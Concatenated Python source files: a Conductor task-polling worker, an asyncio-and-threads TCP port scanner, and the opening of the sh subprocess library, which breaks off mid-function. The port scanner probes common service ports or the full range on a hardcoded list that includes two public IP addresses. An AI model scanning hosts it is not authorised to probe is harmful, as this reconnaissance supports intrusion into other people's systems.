task['outputData'] = resp['output']
task['logs'] = resp['logs']
if 'reasonForIncompletion' in resp:
task['reasonForIncompletion'] = resp['reasonForIncompletion']
self.taskClient.updateTask(task)
except Exception as err:
print(f'Error executing task: {exec_function.__name__} with error: {str(err)}')
task['status'] = 'FAILED'
self.taskClient.updateTask(task)
def poll_and_execute(self, taskType, exec_function, domain=None):
while True:
time.sleep(float(self.polling_interval))
polled = self.taskClient.pollForTask(taskType, self.worker_id, domain)
if polled is not None:
self.taskClient.ackTask(polled['taskId'], self.worker_id)
self.execute(polled, exec_function)
def start(self, taskType, exec_function, wait, domain=None):
"""
start begins the continuous polling of the conductor server
Parameters
----------
taskType: str
The name of the task that the worker is looking to execute
exec_function: function
The function that the worker will execute. The function
must return a dict with the `status`, `output` and `logs`
keys present. If this is not present, an Exception will be
raised
wait: bool
Whether the worker will block execution of further code.
Since the workers are being run in daemon threads, when the
program completes execution, all the threads are destroyed.
Setting wait to True prevents the program from ending.
If multiple workers are being called from the same program,
all but the last start call must have wait set to False.
The last start call must always set wait to True. If a
single worker is being called, set wait to True.
domain: str, optional
The domain of the task under which the worker will run. For
further details refer to the conductor server documentation
By default, it is set to None
"""
print('Polling for task %s at a %f ms interval with %d threads for task execution, with worker id as %s' % (taskType, self.polling_interval * 1000, self.thread_count, self.worker_id))
for x in range(0, int(self.thread_count)):
thread = Thread(target=self.poll_and_execute, args=(taskType, exec_function, domain,))
thread.daemon = True
thread.start()
if wait:
while 1:
time.sleep(1)
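# Minimal example worker function: the worker passes in the polled task (a
# dict) and expects back a dict carrying the 'status', 'output' and 'logs'
# keys, as described in ConductorWorker's docstring.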
def exc(task):
print('Executing the function')
return {'status': 'COMPLETED', 'output': {}, 'logs': []}
def main():
cc = ConductorWorker('http://localhost:8080/api', 5, 0.1)
cc.start(sys.argv[1], exc, False)
cc.start(sys.argv[2], exc, True)
if __name__ == '__main__':
main()
|
ๅคๅฐๅ็ซฏๅฃๆซๆ[็บฟ็จ+ๅ็จ].py | import asyncio
import functools
import threading
# Port scanner
class PortScan:
def __init__(self, ip_list, rate, all_ports=None):
super(PortScan, self).__init__()
self.ip_list = ip_list
self.rate = rate if rate else 500
self.scan_port_list = []
self.common_port = "21,22,23,25,53,69,80,81,82,83,84,85,86,87,88,89,110,111,135,139,143,161,389,443,445,465,513,873,993,995,1080,1099,1158,1433,1521,1533,1863,2049,2100,2181,3128,3306,3307,3308,3389,3690,5000,5432,5900,6379,7001,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8888,9000,9080,9090,9200,9300,9418,11211,27017,27018,27019,50060"
self.ports = [port for port in range(1, 65536)] if all_ports else self.common_port.split(',')  # full 1-65535 range when all_ports is set
async def port_check(self, sem, ip_port):
async with sem:
ip, port = ip_port
conn = asyncio.open_connection(ip, port)
try:
_, _ = await asyncio.wait_for(conn, timeout=2)
return ip, port, 1
except Exception:
return ip, port, 0
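# Note on rate limiting: the semaphore above caps in-flight connection
# attempts per event loop at self.rate (500 by default), so large scans do
# not exhaust file descriptors; each probe either completes the TCP
# handshake within the 2-second timeout (port open) or is reported closed.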
async def async_tcp_scan(self, ip, loop):
sem = asyncio.Semaphore(self.rate)
asyncio.set_event_loop(loop)
tasks = []
for port in self.ports:
one_ip_scan_task = asyncio.ensure_future(self.port_check(sem, (ip, int(port))))
one_ip_scan_task.add_done_callback(self.callback)
tasks.append(one_ip_scan_task)
futus = asyncio.gather(*tasks)
def done_callback(loop, fut):
loop.stop()
futus.add_done_callback(functools.partial(done_callback, loop))
# loop.run_until_complete(asyncio.wait(tasks))
def callback(self, future):
ip, port, status = future.result()
if status:
print(ip, port, status)
def thread_tcp_port_scan(self):
def start_loop(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
for ip in self.ip_list:
sub_loop = asyncio.new_event_loop()
t = threading.Thread(target=start_loop, args=(sub_loop,))
t.start()
future = asyncio.run_coroutine_threadsafe(self.async_tcp_scan(ip, sub_loop), sub_loop)
# future.add_done_callback(close_loop(sub_loop))
import time
if __name__ == '__main__':
ip_list = ["127.0.0.1","106.75.227.164","14.116.225.3"]
now = time.time
start = now()
ps = PortScan(ip_list, 500)
# ps.async_tcp_scan(ip_list[0])
ps.thread_tcp_port_scan()
print("Time:", now() - start)
|
sh.py | """
http://amoffat.github.io/sh/
"""
#===============================================================================
# Copyright (C) 2011-2020 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.13.1"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower(): # pragma: no cover
raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
import sys
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
import traceback
import os
import re
import time
import getpass
from types import ModuleType, GeneratorType
from functools import partial
import inspect
import tempfile
import warnings
import stat
from collections import deque
import glob as glob_module
import ast
from contextlib import contextmanager
import pwd
import errno
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"
# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))
if IS_PY3:
from io import StringIO
ioStringIO = StringIO
from io import BytesIO as cStringIO
iocStringIO = cStringIO
from queue import Queue, Empty
# the builtin "callable" was removed in python 3.0/3.1 and only restored in 3.2
if not hasattr(__builtins__, "callable"):
def callable(ob):
return hasattr(ob, "__call__")
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from io import StringIO as ioStringIO
from io import BytesIO as iocStringIO
from Queue import Queue, Empty
try:
from shlex import quote as shlex_quote # here from 3.3 onward
except ImportError:
from pipes import quote as shlex_quote # undocumented before 2.7
IS_MACOS = platform.system() in ("AIX", "Darwin")
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__
import pty
import termios
import signal
import gc
import select
import threading
import tty
import fcntl
import struct
import resource
import logging
import weakref
# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the same current working directory for the duration of
# the with-context
PUSHD_LOCK = threading.RLock()
if hasattr(inspect, "getfullargspec"):
def get_num_args(fn):
return len(inspect.getfullargspec(fn).args)
else:
def get_num_args(fn):
return len(inspect.getargspec(fn).args)
if IS_PY3:
raw_input = input
unicode = str
basestring = str
long = int
_unicode_methods = set(dir(unicode()))
HAS_POLL = hasattr(select, "poll")
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
class Poller(object):
def __init__(self):
self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & (select.POLLOUT):
results.append((f, POLLER_EVENT_WRITE))
elif events & (select.POLLHUP):
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
def _register(self, f, l):
if f not in l:
l.append(f)
def _unregister(self, f, l):
if f in l:
l.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
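# Usage sketch (illustrative, not called anywhere): both Poller
# implementations above expose the same interface, so calling code stays
# agnostic about poll vs. select:
#
#     poller = Poller()
#     poller.register_read(fileobj)
#     for f, event in poller.poll(timeout=1.0):
#         if event == POLLER_EVENT_READ:
#             data = f.read()
#     poller.unregister(fileobj)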
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except:
s = s.encode(fallback_encoding, "replace")
return s
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boilerplate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __reduce__(self):
return (self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate))
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
self.truncate = truncate
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
if not IS_PY3:
# Exception messages should be treated as an API which takes native str type on both
# Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on
# Python3)
msg = encode_to_py3bytes_or_py2str(msg)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode): pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout or .wait(timeout)) was hit """
def __init__(self, exit_code, full_cmd):
self.exit_code = exit_code
self.full_cmd = full_cmd
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError): pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = {}
for k,v in signal.__dict__.items():
if re.match(r"SIG[a-zA-Z]+", k):
SIGNAL_MAPPING[v] = k
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc > 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
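# A minimal self-check of the dynamic exception classes (illustrative, never
# called): names follow the ErrorReturnCode_NNN / SignalException_SIGNAME
# pattern, and the cache guarantees identity across lookups.
def _rc_exc_examples():
    assert get_rc_exc(1).__name__ == "ErrorReturnCode_1"
    assert get_rc_exc(-signal.SIGKILL).__name__ == "SignalException_SIGKILL"
    assert get_rc_exc(1) is get_rc_exc(1)  # cached: the same class object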
# we monkey patch glob. i'm generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
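# Net effect of the patch: glob_module.glob("*.nope") now returns a
# GlobResults instance -- still a (possibly empty) list, but one that
# remembers the original pattern in .path, letting sh distinguish "pattern
# matched nothing" from a deliberately empty argument list.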
def canonicalize(path):
return os.path.abspath(os.path.expanduser(path))
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(fpath):
return (os.path.exists(fpath) and
os.access(fpath, os.X_OK) and
os.path.isfile(os.path.realpath(fpath)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = canonicalize(program)
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(canonicalize(path), program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.set_context(context)
def _format_msg(self, msg, *args):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % args
def set_context(self, context):
if context:
context = context.replace("%", "%%")
self.context = context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
l = Logger(new_name, new_context)
return l
def info(self, msg, *args):
self.log.info(self._format_msg(msg, *args))
def debug(self, msg, *args):
self.log.debug(self._format_msg(msg, *args))
def error(self, msg, *args):
self.log.error(self._format_msg(msg, *args))
def exception(self, msg, *args):
self.log.exception(self._format_msg(msg, *args))
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to pass through to OProc
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is a list, where each element is encoded as bytes (PY3) or str (PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
#
# here we're making a consistent unicode string out of our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._waited_until_completion = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.debug("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.set_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self, timeout=None):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
if timeout is a number, it is the number of seconds to wait for the process to finish; otherwise, block until it does.
this method can raise a TimeoutException, either because of a `_timeout` on the command itself as it was
launched, or because of a timeout passed into this method.
"""
if not self._waited_until_completion:
# if we've been given a timeout, we need to poll is_alive()
if timeout is not None:
waited_for = 0
sleep_amt = 0.1
if timeout < 0:
raise RuntimeError("timeout cannot be negative")
# while we still have time to wait, run this loop
# notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run at
# least once (defining them), given the constraint that timeout is non-negative
while waited_for <= timeout:
alive, exit_code = self.process.is_alive()
# if we're alive, we need to wait some more, but let's sleep before we poll again
if alive:
time.sleep(sleep_amt)
waited_for += sleep_amt
# but if we're not alive, we're done waiting
else:
break
# if we've made it this far, and we're still alive, then it means we timed out waiting
if alive:
raise TimeoutException(None, self.ran)
# if we didn't time out, we fall through and let the rest of the code handle exit_code.
# notice that we set _waited_until_completion here, only if we didn't time out. this allows us to
# re-wait again on timeout, if we catch the TimeoutException in the parent frame
self._waited_until_completion = True
else:
exit_code = self.process.wait()
self._waited_until_completion = True
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code, self.ran)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
self.process._stdin_process.command.wait()
self.log.debug("process completed")
return self
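# a hedged sketch of the re-wait behavior described above:
#
#   p = sh.sleep(10, _bg=True)
#   try:
#       p.wait(timeout=1)          # poll for up to ~1 second
#   except sh.TimeoutException:
#       p.wait()                   # timing out didn't consume the process;
#                                  # we can wait again, to completion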
def is_alive(self):
""" returns whether or not we're still alive. this call has side-effects on OProc """
return self.process.is_alive()[0]
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"],
ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr,
ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the command be pushed onto the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"])
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
# nothing was ready yet; loop and poll again, rather than falling
# through to the decode below with `chunk` unbound
continue
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let whitelisted attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
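# an illustrative sketch: these conversions let command output be used
# directly as numbers, e.g.:
#
#   n = int(sh.wc("-l", _in="a\nb\nc\n"))   # -> 3
#
# str(cmd) decodes the aggregated stdout, and int()/float() strip it first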
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list):
s1 = set(passed_kwargs.keys())
invalid_args = []
for args in invalid_list:
if callable(args):
fn = args
ret = fn(passed_kwargs, merged_kwargs)
invalid_args.extend(ret)
else:
args, error_msg = args
if s1.issuperset(args):
invalid_args.append((args, error_msg))
return invalid_args
def get_fileno(ob):
# in py2, this will return None. in py3, it will return a method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
elif isinstance(ob, (int,long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_fd_based(ob):
return get_fileno(ob) is not None
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
